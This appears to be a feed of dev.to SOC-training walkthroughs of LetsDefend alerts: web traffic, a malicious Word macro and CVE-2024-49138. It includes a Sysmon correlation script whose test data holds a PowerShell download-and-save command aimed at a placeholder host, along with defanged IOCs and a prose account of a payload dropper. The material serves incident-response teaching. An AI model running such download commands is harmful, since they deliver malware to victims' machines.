&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuh12jg2z4mruzn7isxz8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuh12jg2z4mruzn7isxz8.png" alt="reputation" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;9/94 vendors flag this IP as malicious, so we can say it is malicious, with low confidence.&lt;/p&gt;

&lt;p&gt;It was NOT a planned test.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffz4xil7r6v7vts5h4tf9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffz4xil7r6v7vts5h4tf9.png" alt="question" width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The destination IP is a part of the company network, and the source IP, as we know, is an external IP.&lt;br&gt;
Internet -&amp;gt; Company Network&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fihjndqgzwehzwb8k70kj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fihjndqgzwehzwb8k70kj.png" alt="succesfuol" width="800" height="637"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu8vjdw3p4rcl09ku652e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu8vjdw3p4rcl09ku652e.png" alt="suceful" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;YES, the attack was successful, since we can see the status code 200 in the HTTP request.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6m2zjjsjy44yuw2yp2nc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6m2zjjsjy44yuw2yp2nc.png" alt="containment" width="800" height="536"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we move on to the containment phase.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hpnorokr1ab534srco1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hpnorokr1ab534srco1.png" alt="contained" width="800" height="426"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Artifacts added:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26wm7qvxtc34o6h3qx74.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26wm7qvxtc34o6h3qx74.png" alt="artifacts" width="800" height="466"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3nh4olwcxd62j2fgiztg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3nh4olwcxd62j2fgiztg.png" alt=" " width="800" height="594"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Do we need Tier 2 escalation? Answer: Yes, since we know the attack was successful.&lt;/p&gt;

&lt;p&gt;After adding the analyst's notes, we close the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiz6zc5rwcvl6ffc82zde.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiz6zc5rwcvl6ffc82zde.png" alt="closedplaybook" width="800" height="312"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we close the alert:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9jzri3vi87dpumxmgj6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9jzri3vi87dpumxmgj6.png" alt="Imption" width="735" height="532"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;True positive alert: malicious HTTP traffic was detected and succeeded against our internal server. Escalation to Tier 2 is needed for deeper investigation and forensics.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>education</category>
      <category>networksec</category>
    </item>
    <item>
      <title>LetsDefend SOC205 - Malicious Macro has been executed</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Fri, 24 Apr 2026 12:49:55 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc205-malicious-macro-has-been-executed-322p</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc205-malicious-macro-has-been-executed-322p</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0cypxj8652jzgx10sjpg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0cypxj8652jzgx10sjpg.png" alt="alert description" width="800" height="279"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Above is the alert we see; it is a "Medium" severity alert.&lt;/p&gt;

&lt;p&gt;We start by taking ownership of the alert and begin investigating it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbm31zbt703atvnk8ukzw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbm31zbt703atvnk8ukzw.png" alt="create case" width="800" height="351"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we go to the investigation channel and create the case for this investigation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiwetdymdbw2gqol0ch72.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiwetdymdbw2gqol0ch72.png" alt="investigation case" width="800" height="547"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next step for us is to start the playbook.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1wj211e87uz3fx4fo4ie.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1wj211e87uz3fx4fo4ie.png" alt="start playbook" width="800" height="278"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We look up the file hash on VirusTotal and here is what we find:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy60pn8gn6zw3hs0dpmpt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy60pn8gn6zw3hs0dpmpt.png" alt="virustotal" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can conclude that the file is malicious, since 31 out of 67 vendors have flagged it as malicious.&lt;/p&gt;

&lt;p&gt;After searching for the IP on the Log Management tab, we find the following information:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;At 8:41 a file named &lt;code&gt;C:\Users\LetsDefend\Downloads\edit1-invoice.docm.zip&lt;/code&gt; was created (EventID 11 - File Created)&lt;/li&gt;
&lt;li&gt;The user opens the document, and macro code executes a PowerShell command that downloads the remote resource &lt;code&gt;messbox.exe&lt;/code&gt; from hxxp[:]//www[.]greyhathacker[.]net/tools/messbox[.]exe and saves it as &lt;code&gt;mess.exe&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;PowerShell caused a DNS lookup for the C2 host (92[.]204[.]221[.]16)&lt;/li&gt;
&lt;/ul&gt;
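&lt;p&gt;The timeline above can be reconstructed from endpoint telemetry instead of by hand. The script below is an added example, not code from the LetsDefend walkthrough: it correlates Sysmon-style events (lure file created, an Office application spawning PowerShell, that PowerShell process resolving the download host and dropping &lt;code&gt;mess.exe&lt;/code&gt;) into one chain per host, and leaves an Explorer-launched admin PowerShell alone. All events are constructed; the host names, process GUIDs, download host and resolved address are placeholders standing in for the defanged values above.&lt;/p&gt;

```python
"""Correlate Sysmon-style endpoint events into an Office macro delivery chain.

Added example, not code from the LetsDefend walkthrough: it rebuilds the timeline
the analyst assembled by hand (lure file created, Office spawns PowerShell,
PowerShell resolves the download host, dropped executable). All events, host
names, GUIDs and the download host are constructed; the real host and C2 address
stay defanged in the post above.
"""
from datetime import datetime, timedelta

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
LURE_EXTENSIONS = (".docm", ".dotm", ".xlsm", ".pptm", ".docm.zip", ".xlsm.zip")
WINDOW = timedelta(minutes=10)   # how far apart the stages of one chain may be

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD_IMAGE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"

# Constructed Sysmon events (EventID 1 process create, 11 file create, 22 DNS query).
EVENTS = [
    {"EventID": 11, "UtcTime": "2024-02-28 08:41:02", "Computer": "Jayne",
     "Image": r"C:\Program Files\Google\Chrome\chrome.exe", "ProcessGuid": "{b1}",
     "TargetFilename": r"C:\Users\LetsDefend\Downloads\edit1-invoice.docm.zip"},
    {"EventID": 1, "UtcTime": "2024-02-28 08:42:10", "Computer": "Jayne",
     "Image": WORD_IMAGE, "ParentImage": r"C:\Windows\explorer.exe", "ProcessGuid": "{w1}",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\LetsDefend\Downloads\edit1-invoice.docm"'},
    {"EventID": 1, "UtcTime": "2024-02-28 08:42:15", "Computer": "Jayne",
     "Image": PS_IMAGE, "ParentImage": WORD_IMAGE, "ProcessGuid": "{p1}",
     "CommandLine": "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile("
                    "'http://download-host.example/tools/messbox.exe',"
                    r"'C:\Users\LetsDefend\AppData\Local\Temp\mess.exe')"},
    {"EventID": 22, "UtcTime": "2024-02-28 08:42:16", "Computer": "Jayne",
     "Image": PS_IMAGE, "ProcessGuid": "{p1}",
     "QueryName": "download-host.example", "QueryResults": "192.0.2.44;"},
    {"EventID": 11, "UtcTime": "2024-02-28 08:42:18", "Computer": "Jayne",
     "Image": PS_IMAGE, "ProcessGuid": "{p1}",
     "TargetFilename": r"C:\Users\LetsDefend\AppData\Local\Temp\mess.exe"},
    # Benign admin PowerShell on another host: Explorer parent, so not an Office chain.
    {"EventID": 1, "UtcTime": "2024-02-28 08:50:00", "Computer": "Admin-PC",
     "Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe", "ProcessGuid": "{p2}",
     "CommandLine": "powershell.exe Get-Service"},
    {"EventID": 22, "UtcTime": "2024-02-28 08:50:01", "Computer": "Admin-PC",
     "Image": PS_IMAGE, "ProcessGuid": "{p2}", "QueryName": "wpad.corp.example"},
]


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def within_window(earlier, later, window=WINDOW):
    """True when `later` is at or after `earlier` and at most `window` later."""
    delta = parse_time(later) - parse_time(earlier)
    return delta == max(timedelta(0), min(delta, window))  # clamp-based range check


def find_macro_chains(events):
    """One chain per PowerShell spawned by an Office app, with its linked stages attached."""
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["Computer"], []).append(ev)
    chains = []
    for host, host_events in by_host.items():
        host_events.sort(key=lambda e: e["UtcTime"])
        for ev in host_events:
            if ev["EventID"] != 1 or basename(ev["Image"]) != "powershell.exe":
                continue
            if basename(ev.get("ParentImage", "")) not in OFFICE_APPS:
                continue   # PowerShell from Explorer, schedulers etc. is out of scope here
            guid = ev["ProcessGuid"]
            chain = {"host": host, "spawned_at": ev["UtcTime"], "command_line": ev["CommandLine"],
                     "lure": None, "dns_queries": [], "dropped_files": []}
            for other in host_events:
                same_proc = other.get("ProcessGuid") == guid
                target = other.get("TargetFilename", "")
                if (other["EventID"] == 11 and target.lower().endswith(LURE_EXTENSIONS)
                        and within_window(other["UtcTime"], ev["UtcTime"])):
                    chain["lure"] = target   # macro document created shortly before the spawn
                elif same_proc and other["EventID"] == 22 and within_window(ev["UtcTime"], other["UtcTime"]):
                    chain["dns_queries"].append(other["QueryName"])
                elif same_proc and other["EventID"] == 11 and within_window(ev["UtcTime"], other["UtcTime"]):
                    chain["dropped_files"].append(target)
            # A DNS query plus a dropped file from the same process is the full download chain.
            chain["verdict"] = ("macro-download-chain"
                                if chain["dns_queries"] and chain["dropped_files"]
                                else "office-spawned-powershell")
            chains.append(chain)
    return chains


if __name__ == "__main__":
    for chain in find_macro_chains(EVENTS):
        print(chain["host"], chain["verdict"], chain["lure"], chain["dns_queries"], chain["dropped_files"])
```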

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz88u72truwggxc81msrx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz88u72truwggxc81msrx.png" alt="Imageemail" width="800" height="229"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We search for the file name on the Email Security tab and find the email that was used to deliver this file to Jayne.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fetjkexkn5fsbyb3pp1q0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fetjkexkn5fsbyb3pp1q0.png" alt="Imeail" width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight email"&gt;&lt;code&gt;&lt;span class="nt"&gt;From&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; jake.admin@cybercommunity.info&lt;/span&gt;
&lt;span class="nt"&gt;To&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; jayne@letsdefend.io&lt;/span&gt;
&lt;span class="nt"&gt;Subject&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; February Membership Fee&lt;/span&gt;
&lt;span class="nt"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Feb, 28, 2024, 08:12 AM&lt;/span&gt;
&lt;span class="nt"&gt;Action&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Allowed&lt;/span&gt;

Attachment: edit1-invoice.docm.zip
Password: infected
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since we know that the file is malicious and was executed on the host Jayne, we need to contain that host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ufi2do1u090v7dggxng.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ufi2do1u090v7dggxng.png" alt="contained" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The host is successfully contained.&lt;/p&gt;

&lt;p&gt;Defined threat indicator: Other&lt;br&gt;
Check if the malware is quarantined/cleaned: Not quarantined&lt;br&gt;
The malware is: malicious&lt;br&gt;
C2: accessed&lt;br&gt;
Containment is done.&lt;/p&gt;

&lt;p&gt;Artifacts added:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkiatacsthmxsc2mt2oq1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkiatacsthmxsc2mt2oq1.png" alt="artifacts" width="800" height="609"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Analyst's note added:&lt;/p&gt;

&lt;p&gt;On February 28, 2024, at 08:42 AM, a user on host Jayne (IP: 172.16.17.198) opened a malicious macro-enabled Word document named edit1-invoice.docm. The embedded macro executed a PowerShell command that attempted to download a remote executable from www[.]greyhathacker[.]net (92.204.221[.]16). This activity was logged by Sysmon and other endpoint telemetry, including DNS queries and script block execution.&lt;/p&gt;

&lt;p&gt;Earlier, at 08:12 AM, a phishing email originating from jake.admin[@]cybercommunity[.]info was sent to Jayne, containing the malicious document.&lt;/p&gt;

&lt;p&gt;This incident is classified as high severity, as it enabled the download and potential execution of malware. Immediate containment measures included isolating the affected host, preserving relevant artifacts, and defanging the IOCs for safe reporting.&lt;/p&gt;

&lt;p&gt;The playbook is now completed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkq1j2vb17mz6ns2xf9e4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkq1j2vb17mz6ns2xf9e4.png" alt="completedplaybook" width="785" height="501"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we close the alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1m2hsvs00vg8yqn5jd1v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1m2hsvs00vg8yqn5jd1v.png" alt="closeddescription" width="748" height="540"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>discuss</category>
      <category>cybersecurity</category>
      <category>socanalysis</category>
    </item>
    <item>
      <title>Letsdefend SOC335 - CVE-2024-49138 Exploitation Detected</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Tue, 21 Apr 2026 19:06:07 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc335-cve-2024-49138-exploitation-detected-3773</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc335-cve-2024-49138-exploitation-detected-3773</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsei1s4tiu9v7dr1fmguf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsei1s4tiu9v7dr1fmguf.png" alt="Take ownership" width="800" height="444"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Take ownership of the alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg900kgljg1gufygqfmas.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg900kgljg1gufygqfmas.png" alt="Create case" width="800" height="395"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Create case&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3h2he8uko5qs0sr2y2oj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3h2he8uko5qs0sr2y2oj.png" alt="information" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There is a malicious process named &lt;code&gt;svohost.exe&lt;/code&gt;, whose name closely resembles &lt;code&gt;svchost.exe&lt;/code&gt;. Svchost.exe (Service Host) is an essential Windows system process that loads and manages multiple background services (DLL-based) to save system resources and improve stability.&lt;/p&gt;

&lt;p&gt;The process user name &lt;code&gt;EC2AMAZ-ILGVOIN\LetsDefend&lt;/code&gt; is unusual enough to spark doubt and warrant taking the alert seriously.&lt;/p&gt;

&lt;p&gt;Looking at the file hash, I decided to search for it on Virustotal.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftrfk8ial9oi73j5balv6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftrfk8ial9oi73j5balv6.png" alt="virustotal" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;50 out of 72 vendors flag this file as malicious on Virustotal.&lt;/p&gt;

&lt;p&gt;Moving onto Endpoint security:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxn28pulviqzd5j6hhthk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxn28pulviqzd5j6hhthk.png" alt="code" width="800" height="539"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This PowerShell script downloads a password-protected ZIP file (&lt;code&gt;service-installer.zip&lt;/code&gt;) from a remote S3 bucket to &lt;code&gt;C:\temp&lt;/code&gt;, then uses 7-Zip to extract the archive with the password &lt;code&gt;infected&lt;/code&gt; into the same directory. After extraction, it deletes the original ZIP file and executes &lt;code&gt;svohost.exe&lt;/code&gt; from the extracted &lt;code&gt;service_installer&lt;/code&gt; folder. This behavior is highly indicative of malware delivery and execution, as it retrieves a payload from an external source, extracts it using a hardcoded password (often used to evade static scanning), and launches an executable with a name (&lt;code&gt;svohost.exe&lt;/code&gt;) that mimics a legitimate Windows process (&lt;code&gt;svchost.exe&lt;/code&gt;) to avoid detection.&lt;/p&gt;

